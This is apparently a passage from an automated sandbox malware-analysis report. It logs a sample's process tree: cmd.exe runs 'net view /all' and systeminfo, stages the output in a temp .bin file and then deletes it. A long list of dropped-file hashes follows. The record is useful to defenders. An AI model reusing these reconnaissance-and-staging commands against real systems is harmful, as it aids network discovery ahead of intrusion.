- Discovers systems in the same network
PID:4216 -
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"2⤵PID:4156
-
C:\Windows\system32\cmd.execmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"2⤵PID:1528
-
C:\Windows\system32\net.exenet view /all3⤵
- Discovers systems in the same network
PID:3248 -
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"2⤵PID:2308
-
C:\Windows\system32\cmd.execmd /U /C "type C:\Users\Admin\AppData\Local\Temp\C850.bin1 > C:\Users\Admin\AppData\Local\Temp\C850.bin & del C:\Users\Admin\AppData\Local\Temp\C850.bin1"2⤵PID:3640
-
C:\Windows\system32\systeminfo.exesysteminfo.exe1⤵
- Gathers system information
PID:384
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
65KB
MD5cd59f10228885715c333d108db13007f
SHA1431666dc5693935be2cf9b18fa689568f34e20b8
SHA2568b5374afbd47876195196d8df87f2ddafce360434215042b3de53fba9599901a
SHA51202cba01ce794c077e25dd59bb0335150b3550ac733d7542e831ab8b0ae3e209e6f1f1d04b429af2fb60daf2490e089b8f6abfd5de8027ad2f139c047cb62cb43
-
Filesize
44B
MD5f7aea2435aa888b709ca20f816c33bfd
SHA138717c9a73b5f8bd399839cbe0aa57518427e758
SHA256f0c30a157e0a0ea84b114c2b66a66d444a3824c2bfe7829d929b40e6548fa5d5
SHA5121ea828fc1932c97f5ba5f6ebf05f2816d4d89f003b094f2d0868d54f52b53774437037e2c8837e97b820d5f2e5d5707825b048a9ab2af261af00810f01bd8232
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
Filesize
2KB
MD5b4d5b46f6cbb26eae4510ffefbd50180
SHA15b2bace7028f97c76cc98177ee27dd1d3a7d947a
SHA25603c078be2f8e50148af07cd81ffdaeabbe6421c8448487144f05ed159633194b
SHA51260d92dfd725e186ba12f5752cab6a6aae10f2bcc30a4ae7ee73137ae71a0310fb2e9d51ed35e1cc38392ec26f22d33da8378162af1607c3f79bc499513432333
-
Filesize
2KB
MD5b4d5b46f6cbb26eae4510ffefbd50180
SHA15b2bace7028f97c76cc98177ee27dd1d3a7d947a
SHA25603c078be2f8e50148af07cd81ffdaeabbe6421c8448487144f05ed159633194b
SHA51260d92dfd725e186ba12f5752cab6a6aae10f2bcc30a4ae7ee73137ae71a0310fb2e9d51ed35e1cc38392ec26f22d33da8378162af1607c3f79bc499513432333
-
Filesize
2KB
MD511304e810189d866fb1d067b4226f720
SHA137f1c3a86c37957bd6f1ee4355a7228969de8954
SHA256051f33538ab034544e8c652ca3967a3590e6749c1119e092b8378e3562dd152f
SHA5124be53d94bc47367bfda906bae5ae024f07ddbbec6c7668c9aab13d9c149b94fd887f751d23e6d592f67dea48a4a817c5ab53e2f2b857f9af8c29e31f8e2d5e10
-
Filesize
2KB
MD56555e00a5bd734ac4985eae8005caa4a
SHA18db986ba58e89bbef081e8c62cfcbb698faefbab
SHA25614601575b135a2a88a3052d986b9e10bac67bec1d9a0cc34a2a721bf6ac81a2e
SHA512fdb104e96b1c20b2984710cc3d823eb47ad2d1bb747d92d43001f0acbed053b4b8de030f697293643b147820e3f5973f7e39ecf4455dd5b3684dbe7767fbfdbb
-
Filesize
2KB
MD56555e00a5bd734ac4985eae8005caa4a
SHA18db986ba58e89bbef081e8c62cfcbb698faefbab
SHA25614601575b135a2a88a3052d986b9e10bac67bec1d9a0cc34a2a721bf6ac81a2e
SHA512fdb104e96b1c20b2984710cc3d823eb47ad2d1bb747d92d43001f0acbed053b4b8de030f697293643b147820e3f5973f7e39ecf4455dd5b3684dbe7767fbfdbb
-
Filesize
9KB
MD585ece63f96c67c19c30d853daa1f2f80
SHA16dabfd5ea6ae3a2248d837afde06566e7f21d8c7
SHA25669b1314c678146fd450e7d176d7c6a6b899cc22b586fb47e9c82f2fa342760f5
SHA512bbbe91e7de73c40b22c9560fea39fdb97bbd97c910cb43034d1e6204f7b90462872c95416df92fe80e67a8b8307a5b6057d9184be6d6bab2a904225c4034d5d2
-
Filesize
9KB
MD585ece63f96c67c19c30d853daa1f2f80
SHA16dabfd5ea6ae3a2248d837afde06566e7f21d8c7
SHA25669b1314c678146fd450e7d176d7c6a6b899cc22b586fb47e9c82f2fa342760f5
SHA512bbbe91e7de73c40b22c9560fea39fdb97bbd97c910cb43034d1e6204f7b90462872c95416df92fe80e67a8b8307a5b6057d9184be6d6bab2a904225c4034d5d2
-
Filesize
35KB
MD5064e1c6d618d51982a3fc49034449279
SHA102b24698dd2deda95e2b4a6a89dcd4aba575cba6
SHA2563342616c61590237764c5eb15305ff061ff5214d0d0f1a6629ac8c555344983e
SHA51274cd677be6c6a2f0d5c9b58b5f0f185c1f3bfafc12565a9953f525f5c60dbab6db4fb8054620c3c879ac5cf415f35603be14e20b7f11dc0dac22672a32dedabf
-
Filesize
35KB
MD5064e1c6d618d51982a3fc49034449279
SHA102b24698dd2deda95e2b4a6a89dcd4aba575cba6
SHA2563342616c61590237764c5eb15305ff061ff5214d0d0f1a6629ac8c555344983e
SHA51274cd677be6c6a2f0d5c9b58b5f0f185c1f3bfafc12565a9953f525f5c60dbab6db4fb8054620c3c879ac5cf415f35603be14e20b7f11dc0dac22672a32dedabf
-
Filesize
64KB
MD562e78c50aac8d85dc5921a8fa49476e5
SHA111ffee8c79e8ea84c5ef347451115379a1b5cf25
SHA256a9dc4122649f89630c6383ce1602691faee10e9a5835d3e36709b7c4cbb802f5
SHA5123748f7781dc4d4bd24a69cd532226d0c621fe7e95c2eba8efaf57042017fddfbe45bd9c8aee17c42e8a13575aa30b1b791c733ce25a468d814cf4693865f1f3a
-
Filesize
64KB
MD562e78c50aac8d85dc5921a8fa49476e5
SHA111ffee8c79e8ea84c5ef347451115379a1b5cf25
SHA256a9dc4122649f89630c6383ce1602691faee10e9a5835d3e36709b7c4cbb802f5
SHA5123748f7781dc4d4bd24a69cd532226d0c621fe7e95c2eba8efaf57042017fddfbe45bd9c8aee17c42e8a13575aa30b1b791c733ce25a468d814cf4693865f1f3a
-
Filesize
65KB
MD51e1ee75c750bc92d38124ac10b634351
SHA149c0d724825a589a830b3e24e7b6e63197dbc267
SHA25601399d883cf2af6374962b1c900d17c84dadb3c2fbb26218224208d69951cf97
SHA512256e5ee76b4464bd0dcd9bfbcc85dd5b05572da458abe15a3446a119b06c4f694cdbf29e7b0bdf592f01c4e81ced5e67e8a78cba820336b3291c3d37b28b851f
-
Filesize
65KB
MD51e1ee75c750bc92d38124ac10b634351
SHA149c0d724825a589a830b3e24e7b6e63197dbc267
SHA25601399d883cf2af6374962b1c900d17c84dadb3c2fbb26218224208d69951cf97
SHA512256e5ee76b4464bd0dcd9bfbcc85dd5b05572da458abe15a3446a119b06c4f694cdbf29e7b0bdf592f01c4e81ced5e67e8a78cba820336b3291c3d37b28b851f
-
Filesize
65KB
MD5a02aaa0b88c1c0e78d57de5c5030a0f5
SHA1f705b3e4411ce3fd568df68ec50444b124dded80
SHA25680829bd83b8024dbb40c5ae27926ad7e77dcb3c1ed1cda8b2bc2822daa6f3780
SHA5123be19135519a0bfb22c87cb890b9e82403746da773be6aac55d3e15bfcfbc3f5e9959ddbef408e88cb146f9b1844a0bf7f614c3563cc01dc9908e00f13513c8a
-
Filesize
65KB
MD54dfe7605d104363749b031810b0ed58a
SHA1879ade695f3cee771e5ec57c648946b5064a86a8
SHA2567b5d9bfeda2472edc4aba4a1ee23857a62b12cd50bac1ebf0a6b69b167056bfa
SHA512b14ebad24201fe546cf1703ce65bce0d206c74d9cbf2e9b8637b84a8b1c58ea2070328f8d1dd96fc19820a738bcb519d11cd83dcc4429363e6913942f1db8982
-
Filesize
65KB
MD5ae8cd7c77619badaa90ce1fc70c97a82
SHA15d1de7e2a02422a967a87183e18ad21a47877d36
SHA256126e9149cb9692c0116044bc8efba7db39f455b181e03809ba708b92e31040be
SHA5123d603aa42838de2bc90b9f77510615a5c31e4f0965efb198b792a131f12fc05fba109442802e3b448c48ef39fd5278fe99906a4993ebc8fd98f5bb43357ff554
-
Filesize
65KB
MD5cd59f10228885715c333d108db13007f
SHA1431666dc5693935be2cf9b18fa689568f34e20b8
SHA2568b5374afbd47876195196d8df87f2ddafce360434215042b3de53fba9599901a
SHA51202cba01ce794c077e25dd59bb0335150b3550ac733d7542e831ab8b0ae3e209e6f1f1d04b429af2fb60daf2490e089b8f6abfd5de8027ad2f139c047cb62cb43
-
Filesize
1KB
MD5dec1e106b9bd42ff76dcca48a4647c7f
SHA1700c079453dddae9cb51e6048056e21f3a29f8b7
SHA256675f5b7af3c3be845e7b1f5b1fb3f8ba16370e7400e3151c15722e85185e4b06
SHA5123293dc2110074e5913d19e7f1737c384eceeb12f46d98f39ce0171dbe97e6777c2aa587a32db7eb87c4ae4df1fe3e789b18b538e9f26ce2d2662520e8e403f70
-
Filesize
1KB
MD599f16ff1da7e804feb5e04290e668d40
SHA1416ad9642d6bff1e68deb308ad4b912007173636
SHA256be6a979c37f0e67a6ca68b41264c5260fa322ff4b64501457f13c221e93d8609
SHA5120fe14f6280f4a1bbbf65374e8afcb0670185366cd9ba4d174dee47a4293d9b5d73ef90a42282d61fba1aad99bfadfe7c6493f4042daf3288a22178c856ecd297
-
Filesize
3KB
MD5777821e762608d2478554cc466301fd4
SHA14b5a0f3721d809984415ea2690f802582aa00633
SHA2560396723ec1105c30f3f49c7a802a39fd9ac6c5c425c9ee5424c093172ebee0af
SHA51228166ca3e093a667b55a802fbe0f9f695810aeebf7c33f1938f0827b1c5c39eefb628541bdd1fe3e5ce1c05004dddcdcb06dcc08548cecdde51c548d316d4800
-
Filesize
3KB
MD5b8c0cd5cece832852d7ca26c0f7ddabe
SHA18cf07785708a754cedd67107652c879da7322de0
SHA256fda0200dcb3dc7ca5cbe804ef38af5e32a19a992a1574fd36d5b3443b19be0f2
SHA512d493faea775f560243423cfaf1c2bd56902276fed3e6a6d4c68ee99f4cc5653a99ffbb8faf48efed729013bd436cdb27aead31ba3a7aaa34ec0bbd8b05310842
-
Filesize
652B
MD5146183315847259526b776f4e05702d4
SHA19c16126b9c80ce0a775dd0e2b1b6a42c2f817b6d
SHA2569176550073b3105d0fbf6cf246ae7b244289943b5230d1315d6daf26d2c955f7
SHA5122cc4cdaf3330fb058782c880eec0b8e49712ae3cd5f199a8f892ddde20fc7ec165ba3f9a7c5e83e5ae0aa1cf8edbe0dfab421ada3084c41a5942157f494f04d8
-
Filesize
400B
MD5aca9704199c51fde14b8bf8165bc2a4c
SHA1789b408ccad29240bd093515cbd19a199ad2c1c8
SHA256cb3da8a9768252634f8ed4c62e026dc8217b055e00f11b6012a52ed130c92c27
SHA512a8c1df598581f508ecbf1e516744f11abfb71ec6bb9895d0b61f15e70e56e27cb40b4e5395b9411b787f8bb4f264ca704d815260677909dc1e599d601d0b5de6
-
Filesize
369B
MD5a12dbc03083c923b91f0ae5e81c0fa65
SHA12e75e9e5e1bfc1a941ba7fed967b1058f5e0f4b1
SHA256d2b3d6b1ca5ec7600b844f6108ec1da5367895c8f6bfcc9de580f4a30346b4b9
SHA5127a65f3c48de859102d6725b7093ab38bfd2edb9737be999f926e04fd96a90a934fb162290e32b8d7e3ec267f1374e7b2623060637d419b18778f00a637971762
-
Filesize
652B
MD54e155fb1f268acea23442266fa8c4cf3
SHA1cb4dc2af42c4266dbbf55b5dc1135b51e3586d28
SHA256e5b9cd9a3318ad01f7c89ffe770a17c1ebd206dff950943fa7b463ee76e166f9
SHA512ae27fdfbdf04fb2de3f473a078e3154caf8f2d0f277f0ef9e149f6b8e517e27d5e9cb83dc8f726261ff91acd2657300e3f1c099e49fb173c56fdbdb0dae8f999
-
Filesize
410B
MD59a10482acb9e6952b96f4efc24d9d783
SHA15cfc9bf668351df25fcda98c3c2d0bb056c026c3
SHA256a0424e1530f002761a882c19c22504153a5e86d7fbb41391e940452bfa15f377
SHA512e932914ad99d7bd39561e020d1e8c1f4e175c16eae66df720100c65e40ccc3383b5145f703432885f3f1ce080e8a4feb045ddd5c8bbc2f3231c619d04182ac28
-
Filesize
369B
MD5857aefc206e63debbae5504d0f213632
SHA1fc39ba707407a0cf88f36039cf3d00e758c335d7
SHA256f9fe954f217605799e4d4b0d1ecf5f048b7a087416def84fb5ff2ac460939de1
SHA5129502234b553da9fcf25b7d4089947aedc19eeb86114efbb67900b1cce5d37be9479593caaa733d739078c32b4e16e6d4d075ba8bd414c9f4d4be52238defdf96